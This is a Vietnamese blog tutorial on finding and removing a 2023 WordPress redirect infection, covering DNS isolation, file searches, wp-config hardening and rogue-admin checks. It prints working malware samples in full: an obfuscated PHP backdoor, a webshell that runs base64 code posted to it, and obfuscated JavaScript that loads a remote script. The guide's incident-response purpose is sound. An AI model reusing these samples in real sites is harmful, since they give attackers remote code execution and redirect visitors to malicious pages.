WordPress nó chắc chắn là nền tảng được sử dụng nhiều nhất CMS (Content Management System) cho cả blog và cửa hàng trực tuyến mới bắt đầu (với mô-đun WooCommerce), khiến nó trở thành mục tiêu tấn công máy tính (hack) nhiều nhất. Một trong những hoạt động hack được sử dụng nhiều nhất nhằm mục đích chuyển hướng trang web bị xâm nhập sang các trang web khác. Redirect WordPress Hack 2023 là một phần mềm độc hại tương đối mới có tác động chuyển hướng toàn bộ trang web đến các trang web spam hoặc từ đó có thể lây nhiễm sang máy tính của người dùng.
Nếu trang web của bạn được phát triển trên WordPress được chuyển hướng đến một trang web khác, thì rất có thể đó là nạn nhân của vụ hack chuyển hướng vốn đã nổi tiếng.
Trong hướng dẫn này, bạn sẽ tìm thấy thông tin cần thiết và các mẹo hữu ích để bạn có thể khử vi-rút một trang web bị nhiễm chuyển hướng WordPress Hack (Virus Redirect). Thông qua các nhận xét, bạn có thể nhận thêm thông tin hoặc yêu cầu trợ giúp.
Nội dung
Phát hiện vi-rút chuyển hướng trang web WordPress
Lưu lượng truy cập trang web giảm đột ngột và vô cớ, số lượng đơn đặt hàng giảm (trong trường hợp cửa hàng trực tuyến) hoặc doanh thu quảng cáo là những dấu hiệu đầu tiên cho thấy có điều gì đó không ổn. phát hiện"Redirect WordPress Hack 2023” (Chuyển hướng vi-rút) cũng có thể được thực hiện “trực quan” khi bạn mở trang web và bạn được chuyển hướng đến một trang web khác.
Theo kinh nghiệm, hầu hết các phần mềm độc hại trên web đều tương thích với các trình duyệt internet: Chrome, Firefox, Edge, Opera. Nếu bạn là người sử dụng máy tính Mac, những virus này không thực sự hiển thị trong trình duyệt Safari. Hệ thống an ninh từ Safari âm thầm chặn các tập lệnh độc hại này.
Phải làm gì nếu bạn có một trang web bị nhiễm Redirect WordPress Hack
Tôi hy vọng bước đầu tiên không phải là hoảng sợ hoặc xóa trang web. Lúc đầu, ngay cả các tệp bị nhiễm hoặc vi-rút cũng không nên bị xóa. Chúng chứa thông tin có giá trị có thể giúp bạn hiểu vị trí vi phạm an ninh và điều gì đã ảnh hưởng đến vi-rút. Phương thức hoạt động.
Đóng trang web cho công chúng.
Làm thế nào để bạn đóng một trang web virus cho khách truy cập? Đơn giản nhất là sử dụng trình quản lý DNS và xóa IP cho "A" (tên miền) hoặc xác định IP không tồn tại. Do đó, khách truy cập trang web sẽ được bảo vệ khỏi điều này redirect WordPress hack điều này có thể dẫn họ đến các trang web có vi-rút hoặc SPAM.
Nếu bạn dùng CloudFlare với tư cách là người quản lý DNS, bạn đăng nhập vào tài khoản và xóa các bản ghi DNS"A” cho tên miền. Do đó, tên miền bị ảnh hưởng bởi vi-rút sẽ vẫn không có IP, không thể truy cập từ Internet được nữa.
Bạn sao chép IP của trang web và "lộ trình" nó để chỉ bạn có thể truy cập nó. Từ máy tính của bạn.
Cách đổi IP thật của website trên máy tính Windows?
Phương pháp thường được sử dụng để chặn quyền truy cập vào một số trang web nhất định bằng cách chỉnh sửa tệp "hosts".
1. Bạn mở Notepad hoặc trình soạn thảo văn bản khác (có quyền administrator) và chỉnh sửa tệp "hosts“. Nó nằm tại:
C:\Windows\System32\drivers\etc\hosts2. Trong tệp "hosts", hãy thêm "tuyến đường" vào IP thực của trang web của bạn. IP đã xóa ở trên khỏi trình quản lý DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Lưu file và truy cập trang web trên trình duyệt.
Nếu trang web không mở và bạn không làm gì sai trong tệp "hosts", thì rất có thể đó là bộ đệm DNS.
Để xóa bộ đệm DNS trên hệ điều hành Windows, mở Command Prompt, nơi bạn chạy lệnh:
ipconfig /flushdnsCách đổi IP thật của website trên máy tính Mac / MacSách?
Đối với người dùng máy tính Mac việc thay đổi IP thực của một trang web có phần đơn giản hơn.
1. Mở tiện ích Terminal.
2. Chạy dòng lệnh (yêu cầu mật khẩu hệ thống để chạy):
sudo nano /etc/hosts3. Tương tự với máy tính Windows, thêm IP thực của tên miền.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Lưu các thay đổi. Ctrl+X (y).
Sau khi bạn đã "định tuyến", bạn là người duy nhất có thể truy cập trang web bị nhiễm bằng Redirect WordPress Hack.
Sao lưu toàn bộ trang web – Tệp và cơ sở dữ liệu
Ngay cả khi nó bị nhiễm “redirect WordPress hack”, khuyến nghị là tạo một bản sao lưu chung cho toàn bộ trang web. Tập tin và cơ sở dữ liệu. Có thể bạn cũng có thể lưu một bản sao cục bộ của cả hai tệp từ public / public_html cũng như cơ sở dữ liệu.
Xác định các tệp bị nhiễm và những tệp bị sửa đổi bởi Redirect WordPress Hack 2023
Các tập tin mục tiêu chính của WordPress có index.php (trong thư mục gốc), header.php, index.php SI footer.php của chủ đề WordPress tài sản. Kiểm tra các tệp này theo cách thủ công và xác định mã độc hại hoặc tập lệnh phần mềm độc hại.
Vào năm 2023, một loại vi-rút của “Redirect WordPress Hack” đưa vào index.php một mã có dạng:
(Tôi không khuyên bạn nên chạy các mã này!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Giải mã, cái này tập lệnh độc hại về cơ bản đó là hậu quả của việc trang web bị nhiễm WordPress. Đó không phải là tập lệnh đằng sau phần mềm độc hại, mà là tập lệnh giúp chuyển hướng trang web bị nhiễm. Nếu chúng tôi giải mã tập lệnh trên, chúng tôi nhận được:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Để xác định tất cả các tệp trên máy chủ có chứa mã này, thật tốt khi có quyền truy cập SSH về máy chủ để chạy các dòng lệnh kiểm tra và quản lý file trên Linux.
Dưới đây là hai lệnh chắc chắn hữu ích để xác định các tệp đã sửa đổi gần đây và các tệp có chứa một mã (chuỗi) nhất định.
Làm thế nào để bạn nhìn thấy trên Linux Các tệp PHP đã thay đổi trong 24 giờ qua hoặc một số khung thời gian khác?
Đặt hàng "find” rất đơn giản để sử dụng và cho phép tùy chỉnh để đặt khoảng thời gian, đường dẫn tìm kiếm và loại tệp.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Ở đầu ra, bạn sẽ nhận được thông tin về ngày giờ tệp được sửa đổi, quyền ghi/đọc/thực thi (chmod) và nó thuộc về nhóm/người dùng nào.
Nếu bạn muốn kiểm tra thêm ngày trước, hãy thay đổi giá trị "-mtime -1" hoặc dùng "-mmin -360” trong vài phút (6 giờ).
Làm cách nào để tìm kiếm mã (chuỗi) bên trong tệp PHP, Java?
Dòng lệnh "find" cho phép bạn nhanh chóng tìm thấy tất cả các tệp PHP hoặc Java có chứa một mã nhất định như sau:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Lệnh sẽ tìm kiếm và hiển thị các tập tin .php SI .js có chứa "uJjBRODYsU".
Với sự trợ giúp của hai lệnh trên, bạn sẽ rất dễ dàng tìm ra tệp nào đã được sửa đổi gần đây và tệp nào chứa mã phần mềm độc hại.
Loại bỏ mã độc khỏi các tệp đã sửa đổi mà không ảnh hưởng đến mã chính xác. Trong trường hợp của tôi, phần mềm độc hại đã được đặt trước khi mở <head>.
Khi thực hiện lệnh "tìm" đầu tiên, rất có thể phát hiện ra các tệp mới trên máy chủ không phải của bạn WordPress cũng không đặt ở đó bởi bạn. Tập tin thuộc loại virus Redirect WordPress Hack.
Trong trường hợp tôi đã điều tra, các tệp có dạng “wp-log-nOXdgD.php“. Đây là những tệp "đẻ trứng" cũng chứa mã phần mềm độc hại được vi-rút sử dụng để chuyển hướng.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Mục đích của các tệp loại "wp-log-*” là phát tán vi-rút hack chuyển hướng đến các trang web khác được lưu trữ trên máy chủ. Nó là một mã phần mềm độc hại thuộc loại “webshell” bao gồm một phần cơ bản (trong đó một số biến được mã hóa được xác định) và o phần thi hành qua đó kẻ tấn công cố gắng tải và thực thi mã độc hại trên hệ thống.
Nếu có một biến POST có tên là 'bh' và giá trị được mã hóa của nó MD5 bằng "8f1f964a4b4d8d1ac3f0386693d28d03", thì đoạn script xuất hiện để viết nội dung được mã hóa base64 của một biến khác gọi là 'b3' trong một tệp tạm thời và sau đó cố gắng đưa tệp tạm thời này vào.
Nếu có một biến POST hoặc GET có tên là 'tick', tập lệnh sẽ phản hồi với giá trị MD5 của chuỗi "885".
Để xác định tất cả các tệp trên máy chủ có chứa mã này, hãy chọn một chuỗi phổ biến, sau đó chạy lệnh “find” (tương tự như trên). Xóa tất cả các tệp chứa mã phần mềm độc hại này.
Lỗ hổng bảo mật bị khai thác bởi Redirect WordPress Hack
Nhiều khả năng virus chuyển hướng này đến qua khai thác người dùng quản trị WordPress hoặc bằng cách xác định một plugin dễ bị tổn thương cho phép thêm người dùng với đặc quyền của administrator.
Đối với hầu hết các trang web được xây dựng trên nền tảng WordPress điều đó là có thể chỉnh sửa tập tin chủ đề hoặc plugintừ giao diện quản trị (Dashboard). Do đó, kẻ độc hại có thể thêm mã phần mềm độc hại vào các tệp chủ đề để tạo các tập lệnh được hiển thị ở trên.
Một ví dụ về mã phần mềm độc hại như vậy là:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript được xác định trong tiêu đề chủ đề WordPress, ngay sau khi mở nhãn <head>.
Rất khó để giải mã mã JavaScript này, nhưng rõ ràng là nó truy vấn một địa chỉ web khác từ đó rất có thể nó sẽ tìm nạp các tập lệnh khác để tạo tệp "wp-log-*” mà tôi đã nói ở trên.
Tìm và xóa mã này khỏi tất cả các tệp PHP ảnh hưởng.
Theo như tôi có thể nói, mã này là thêm thủ công bởi một người dùng mới với các đặc quyền quản trị.
Vì vậy, để ngăn việc bổ sung phần mềm độc hại từ Trang tổng quan, tốt nhất bạn nên tắt tùy chọn chỉnh sửa WordPress Chủ đề/Plugin từ Bảng điều khiển.
chỉnh sửa tập tin wp-config.php và thêm các dòng:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Sau khi thực hiện thay đổi này, không có người dùng nào WordPress bạn sẽ không thể chỉnh sửa tệp từ Trang tổng quan nữa.
Kiểm tra người dùng với vai trò của Administrator
Dưới đây là truy vấn SQL bạn có thể sử dụng để tìm kiếm người dùng có vai trò là administrator trong nền tảng WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Truy vấn này sẽ trả về tất cả người dùng trong bảng wp_users ai giao vai administrator. Truy vấn cũng được thực hiện cho bảng wp_usermeta để tìm kiếm trong meta 'wp_capabilities', chứa thông tin về vai trò của người dùng.
Một phương pháp khác là xác định chúng từ: Dashboard → Users → All Users → Administrator. Tuy nhiên, có những phương pháp mà người dùng có thể bị ẩn trong bảng điều khiển Bảng điều khiển. Vì vậy, cách tốt nhất để xem người dùng "Administrator"Trong WordPress là lệnh SQL ở trên.
Trong trường hợp của tôi, tôi đã xác định trong cơ sở dữ liệu người dùng có tên "wp-import-user“. Khá gợi ý.
Cũng từ đây, bạn có thể xem ngày giờ khi người dùng WordPress đã được tạo ra. ID người dùng cũng rất quan trọng vì nó tìm kiếm nhật ký máy chủ. Bằng cách này, bạn có thể thấy tất cả hoạt động của người dùng này.
Xóa người dùng với vai trò của administrator mà bạn không biết, sau đó thay đổi mật khẩu cho tất cả người dùng quản trị. biên tập viên, tác giả, Administrator.
Thay đổi mật khẩu của người dùng cơ sở dữ liệu SQL của trang web bị ảnh hưởng.
Sau khi thực hiện các bước này, trang web có thể được khởi động lại cho tất cả người dùng.
Tuy nhiên, hãy nhớ rằng những gì tôi trình bày ở trên có lẽ là một trong hàng ngàn trường hợp mà một trang web bị nhiễm vi-rút. Redirect WordPress Hack vào năm 2023.
Nếu trang web của bạn đã bị nhiễm và bạn cần trợ giúp hoặc nếu bạn có bất kỳ câu hỏi nào, phần nhận xét sẽ được mở.
